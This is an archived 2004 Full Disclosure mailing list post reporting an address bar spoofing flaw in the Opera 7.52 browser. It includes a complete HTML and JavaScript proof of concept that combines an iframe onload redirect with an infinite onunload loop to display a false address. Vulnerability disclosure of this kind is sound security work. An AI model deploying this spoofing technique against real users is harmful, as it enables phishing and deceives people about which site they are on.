Full Disclosure mailing list archives
Opera 7.52 (Build 3834) Address Bar Spoofing Issue
From: "bitlance winter" <bitlance_3 () hotmail com>
Date: Thu, 08 Jul 2004 08:48:23 +0000
Hi List.A vulnerability is found in the Opera browser version 7.52 , which potentially can be exploited by malicious people to conduct phishing attacks against a user.
The issue may be caused due to a race condition and will sometimes make it possible to display spoofed information in the address bar via a specially crafted HTML document. Tested on WindowsXP SP1. Demonstration HTML source code: ======== begin ======== [!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"] [html lang="en"] [head] [meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"] [meta http-equiv="Content-Script-Type" content="text/javascript"] [meta http-equiv="Content-Style-Type" content="text/css"] [title]Opera 7.52 Address Bar Spoofing Vulnerability[/title] [style type="text/css"] [!-- /* begin */ h1 { font-size:120%;} h2 { font-size:100%;} /* end */ --] [/style] [script type="text/javascript"] [!-- function urlfake(){ location.href="http://www.microsoft.com/"; } function preinline () { myvar = '[iframe onload="urlfake()" '; myvar = myvar + 'title="preload inline frame" '; myvar = myvar + 'src="http://www.opera.com/" '; myvar = myvar + 'frameborder="0" width="760" height="1800" '; myvar = myvar + 'marginwidth="0" marginheight="0"]'; myvar = myvar + '[' + '/iframe]'; document.write (myvar); } // --] [/script] [/head] [body onunload="while(1){};"] [h1]Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue[/h1] [h2]Tested on WindowsXP SP1[/h2] [p] [script type="text/javascript"] [!-- preinline (); // --] [/script] [/p] [/body] [/html] ========= end ========= (Sorry,too long code.) Thank you, List. -- bitlance winter _________________________________________________________________FREE pop-up blocking with the new MSN Toolbar get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Opera 7.52 (Build 3834) Address Bar Spoofing Issue bitlance winter (Jul 08)